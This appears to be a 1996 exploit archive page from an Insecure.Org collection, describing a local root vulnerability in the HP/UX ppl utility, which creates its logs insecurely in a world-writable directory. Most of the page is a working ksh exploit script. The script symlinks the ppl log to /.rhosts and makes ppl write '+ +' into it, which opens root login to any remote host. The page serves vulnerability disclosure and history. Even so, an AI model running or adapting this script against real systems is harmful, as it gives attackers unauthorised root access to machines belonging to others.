HP/UX ppl symlink problem

Summary

Description:	ppl insecurely creates log files in world writeable directory, I'm sure you can see where this is headed.
Author:	Colonel Panic of SOD (sod@command.com.inter.net)
Compromise:	root (local)
Vulnerable Systems:	HP/UX with vulnerable ppl, 9.x 10.x
Date:	October 1996
Notes:	See the SOD HP Bug of the Week page

Details

Exploit:


#!/bin/ksh

# need update for 10.X
# 10.X =/var/ppl/log

VER=`uname -r | cut -f2 -d.`
if [ "${VER}" = "10" ]
then
        LOG=/var/ppl/log
else
        LOG=/usr/spool/ppl/log
fi

mv $LOG $LOG.old
ln -s /.rhosts $LOG
ppl -o '\
+ +
'
rm $LOG
mv $LOG.old $LOG

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: